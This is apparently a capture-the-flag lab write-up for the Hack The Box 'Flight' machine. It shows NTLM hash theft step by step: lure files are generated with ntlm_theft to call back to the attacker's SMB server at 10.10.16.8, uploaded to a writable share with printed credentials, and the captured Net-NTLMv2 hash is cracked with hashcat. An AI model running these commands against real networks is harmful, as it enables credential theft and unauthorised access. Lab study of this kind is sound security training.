InfoSec LAB

Flight_NTLM_Theft

Created: 6 min read

NTLM Theft

ntlm theft is a common technique used by adversary to leverage the inherent windows network authentication authentication upon accessing the remote resource. this technique is occasionally denoted as ntlm leak as in methods to invoke a target Windows host to perform network authentication to reveal the credential hashes, which can further be capitalized to offline password cracking or NTLM relay

One of the methods was employed earlier to leak the Net-NTLMv2 hash of the svc_apache account and it was cracked at a later stage

The current assessment revealed the s.moon user with a limited write access to the \\g0.flight.htb\Shared share.

  • The observed limit is that files with .ini and .xml extensions are allowed for upload.
  • The \\g0.flight.htb\Shared share appears to be actively interacted by getting wiped off from either scheduled task or users as name of the share suggests

In the following sections, I will be attempting to invoke the target system for a network authentication leveraging the Windows system configuration files.

Windows System Configuration Files

Windows uses various files and file extensions for system functionality, customization, or optimization purposes to provide instructions or metadata related to the folder(directory) or drive they are associated with. Some of these files are specific to certain functionalities or features of the operating system. Some examples are;

  • desktop.ini:
    • Purpose: Customizes the appearance and behavior of a folder.
    • Execution: When Windows Explorer encounters a desktop.ini file within a folder, it reads the contents of the file and applies the specified configurations for that specific folder.
  • autorun.inf:
    • Purpose: Specifies autorun settings for CDs, DVDs, USB drives, etc.
    • Execution: When a drive is accessed, Windows checks for the presence of an autorun.inf file. If found, it may automatically run a program or open a document based on the instructions in the file.
  • Thumbs.db, iconcache.db, thumbscache_*.db:
    • Purpose: Stores thumbnail cache information to speed up the display of thumbnails.
    • Execution: These files are automatically generated and managed by the operating system. Windows uses the cached information to quickly display thumbnails for folders.
  • folder.htt:
    • Purpose: Defines HTML templates for customizing the appearance of folders in Windows.
    • Execution: When viewing a folder with customized settings, Windows uses the instructions in the folder.htt file to render the folder’s appearance.
  • custom.dic:
    • Purpose: Stores custom words added by the user to the Windows spell checker dictionary.
    • Execution: The content is used by the spell checker to recognize and include user-added words in the dictionary.

There is a [[#[ntlm_theft](https //github.com/Greenwolf/ntlm_theft)|tool]] that automates the generation process

ntlm_theft

ntlm_theft is primarily aimed at Penetration Testers and Red Teamers, who will use it to perform internal phishing on target company employees, or to mass test antivirus and email gateways. It may also be used for external phishing if outbound SMB access is allowed on the perimeter firewall.

┌──(kali㉿kali)-[~/…/htb/labs/flight/ntlm_theft]
└─$ python3 ntlm_theft.py -g all -s 10.10.16.8 -f stealer
created: stealer/stealer.scf (BROWSE TO FOLDER)
created: stealer/stealer-(url).url (BROWSE TO FOLDER)
created: stealer/stealer-(icon).url (BROWSE TO FOLDER)
created: stealer/stealer.lnk (BROWSE TO FOLDER)
created: stealer/stealer.rtf (OPEN)
created: stealer/stealer-(stylesheet).xml (OPEN)
created: stealer/stealer-(fulldocx).xml (OPEN)
created: stealer/stealer.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
created: stealer/stealer-(includepicture).docx (OPEN)
created: stealer/stealer-(remotetemplate).docx (OPEN)
created: stealer/stealer-(frameset).docx (OPEN)
created: stealer/stealer-(externalcell).xlsx (OPEN)
created: stealer/stealer.wax (OPEN)
created: stealer/stealer.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
created: stealer/stealer.asx (OPEN)
created: stealer/stealer.jnlp (OPEN)
created: stealer/stealer.application (DOWNLOAD AND OPEN)
created: stealer/stealer.pdf (OPEN AND ALLOW)
created: stealer/zoom-attack-instructions.txt (PASTE TO CHAT)
created: stealer/Autorun.inf (BROWSE TO FOLDER)
created: stealer/desktop.ini (BROWSE TO FOLDER)
Generation Complete.

I will be generating all the stealers, -g all, to test out the whitelist stealer prefix is given

┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ simplesmb . -smb2support  
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] Config file parsed
[*] callback added for uuid 4b324fc8-1670-01d3-1278-5a47bf6ee188 v:3.0
[*] callback added for uuid 6bffd098-a112-3610-9833-46c3f87e345a v:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

I will have Kali running an arbitrary SMB server for inbound NTLM authentication

┌──(kali㉿kali)-[~/…/htb/labs/flight/ntlm_theft]
└─$ cd stealer ; smbclient //g0.flight.htb/Shared -U 'flight.htb\s.moon%S@Ss!K@*t13' -c 'prompt false ; mput *'
NT_STATUS_ACCESS_DENIED opening remote file \stealer.lnk
putting file stealer.application as \stealer.application (3.5 kb/s) (average 3.5 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \stealer.wax
NT_STATUS_ACCESS_DENIED opening remote file \stealer-(externalcell).xlsx
putting file stealer.jnlp as \stealer.jnlp (0.3 kb/s) (average 1.8 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \stealer-(icon).url
NT_STATUS_ACCESS_DENIED opening remote file \stealer-(remotetemplate).docx
NT_STATUS_ACCESS_DENIED opening remote file \Autorun.inf
NT_STATUS_ACCESS_DENIED opening remote file \stealer.scf
putting file desktop.ini as \desktop.ini (0.2 kb/s) (average 1.4 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \stealer-(url).url
NT_STATUS_ACCESS_DENIED opening remote file \stealer.asx
NT_STATUS_ACCESS_DENIED opening remote file \stealer.pdf
NT_STATUS_ACCESS_DENIED opening remote file \stealer-(includepicture).docx
putting file stealer-(fulldocx).xml as \stealer-(fulldocx).xml (78.2 kb/s) (average 33.3 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \zoom-attack-instructions.txt
NT_STATUS_ACCESS_DENIED opening remote file \stealer.htm
NT_STATUS_ACCESS_DENIED opening remote file \stealer.rtf
putting file stealer-(stylesheet).xml as \stealer-(stylesheet).xml (0.4 kb/s) (average 28.5 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \stealer.m3u
NT_STATUS_ACCESS_DENIED opening remote file \stealer-(frameset).docx
 
# ls
drw-rw-rw-          0  tue dec 12 01:50:10 2023 .
drw-rw-rw-          0  tue dec 12 01:50:10 2023 ..
-rw-rw-rw-         46  tue dec 12 01:50:08 2023 desktop.ini
-rw-rw-rw-      72584  tue dec 12 01:50:09 2023 stealer-(fulldocx).xml
-rw-rw-rw-        162  tue dec 12 01:50:11 2023 stealer-(stylesheet).xml
-rw-rw-rw-       1649  tue dec 12 01:50:06 2023 stealer.application
-rw-rw-rw-        191  tue dec 12 01:50:07 2023 stealer.jnlp

Only the following file extensions were uploaded;

  • .application
  • .jnlp
  • .ini
  • .xml

A moment later, I got a network authentication made to the Kali SMB server by the c.bum user The c.bum user is a valid domain user Additionally, the hashstring appears to be another Net-NTLMv2 hash

I will attempt to crack it with hashcat

Password Cracking

┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ hashcat -a 0 -m 5600 c.bum.hash /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344386
* Bytes.....: 139921519
* Keyspace..: 14344386
 
C.BUM::flight.htb:aaaaaaaaaaaaaaaa:ce9c05bad0ba15ebd2347c51c86b304c:0101000000000000807cf4b2942cda01ea9ad3a12b4497d40000000001001000710073004c0047007500490048004b0003001000710073004c0047007500490048004b0002001000750075006d006800430072007700620004001000750075006d006800430072007700620007000800807cf4b2942cda0106000400020000000800300030000000000000000000000000300000f377ff619a9971b9151148f0afd73f23298106c88f89e83fb08af98d19b03ad30a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0038000000000000000000:Tikkycoll_431012284
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: C.BUM::flight.htb:aaaaaaaaaaaaaaaa:ce9c05bad0ba15eb...000000
Time.Started.....: Tue Dec 12 01:49:03 2023 (4 secs)
Time.Estimated...: Tue Dec 12 01:49:07 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2262.0 kH/s (0.78ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10536960/14344386 (73.46%)
Rejected.........: 0/10536960 (0.00%)
Restore.Point....: 10533888/14344386 (73.44%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: ToNmAi -> TiffanyD
Hardware.Mon.#1..: Util: 59%
 
Stopped: Tue Dec 12 01:49:09 2023

hashcat cracked the password hash The cracked password for the c.bum user is Tikkycoll_431012284 The credential must be validated

Interactive Graph View

Backlinks